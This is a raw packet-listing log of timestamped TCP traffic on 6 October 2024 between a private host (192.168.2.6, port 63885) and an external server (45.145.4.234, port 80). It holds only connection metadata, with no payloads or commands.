                                                                                                                                                Oct 6, 2024 22:18:42.659600973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.659609079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.659616947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.659622908 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.659627914 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.659630060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.659637928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.659645081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.659660101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.659683943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.660455942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.660475969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.660490990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.660506010 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.660517931 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.660533905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.660540104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.660551071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.660563946 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.660594940 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.660612106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.715406895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715424061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715441942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715507984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715523005 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.715542078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715630054 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.715656042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715658903 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715703964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.715843916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715861082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715872049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715883017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.715890884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.715933084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.716114998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.716125965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.716137886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.716150045 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.716190100 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.716319084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.716356993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.718931913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.718988895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.718997955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.719007015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.719078064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.719101906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.719110966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.719120026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.719131947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.719147921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.719172955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.719172955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.719329119 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.719341040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.719367027 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.719388962 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.722567081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.722605944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.722628117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.722637892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.722659111 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.722695112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.722718954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.722729921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.722749949 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.722768068 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.722862959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.722873926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.722886086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.722894907 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.722910881 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.722927094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.740669966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.740693092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.740704060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.740720987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.740760088 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.740828991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.740839958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.740854025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.740892887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.740912914 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.741139889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741152048 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741170883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741179943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.741189957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741205931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.741231918 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.741405964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741415977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741435051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741446018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741457939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741466999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.741483927 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.741501093 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.741761923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741774082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741806030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.741841078 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.741904974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741916895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.741950035 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742111921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742122889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742134094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742145061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742153883 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742163897 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742176056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742183924 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742211103 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742671967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742687941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742698908 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742710114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742718935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742729902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742742062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742750883 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742759943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742770910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742784977 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742795944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742801905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742813110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742821932 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742832899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.742840052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742858887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.742871046 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.743494987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743505955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743519068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743537903 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743542910 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.743556976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743561983 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.743572950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743585110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743590117 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.743599892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743609905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743621111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743628979 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.743643045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.743648052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.743659019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.743683100 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.744348049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744359970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744378090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744389057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744400978 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744411945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.744424105 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.744430065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744441032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.744447947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744461060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744474888 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.744486094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.744491100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744502068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744517088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.744524956 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.744551897 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745206118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745223045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745234013 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745246887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745258093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745271921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745287895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745299101 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745307922 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745327950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745718956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745729923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745743036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745754957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745768070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745778084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745790958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745795012 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745803118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745814085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745826960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745832920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745842934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745851040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745861053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745873928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.745882034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745894909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.745923996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.746622086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746634007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746644974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746656895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746666908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.746676922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746689081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746699095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746706963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.746716976 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746731043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746738911 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.746748924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.746756077 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.746783972 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802197933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802234888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802244902 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802256107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802264929 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802294970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802349091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802360058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802380085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802409887 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802506924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802517891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802556992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802629948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802640915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802669048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802684069 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802807093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802817106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802824974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802838087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.802922964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.802922964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.803061008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.803072929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.803091049 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.803194046 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.805807114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.805856943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.805864096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.805877924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.805886984 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.805910110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.805962086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.805973053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.805993080 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.806010962 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.806097984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.806108952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.806127071 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.806143045 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.806195021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.806225061 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.809526920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.809536934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.809547901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.809559107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.809571028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.809582949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.809626102 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.809644938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.809655905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.809715033 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.827559948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.827595949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.827608109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.827626944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.827644110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.827759981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.827773094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.827795029 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.827821970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.827869892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.827883005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.827892065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.827904940 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.827924013 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.828046083 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828057051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828068018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828088999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.828110933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.828262091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828274012 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828284979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828295946 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828305006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.828308105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828321934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.828346968 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.828594923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828607082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828619957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828630924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828639030 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.828643084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828665972 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.828686953 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:42.828943968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:42.828955889 CEST806388545.145.4.234192.168.2.6
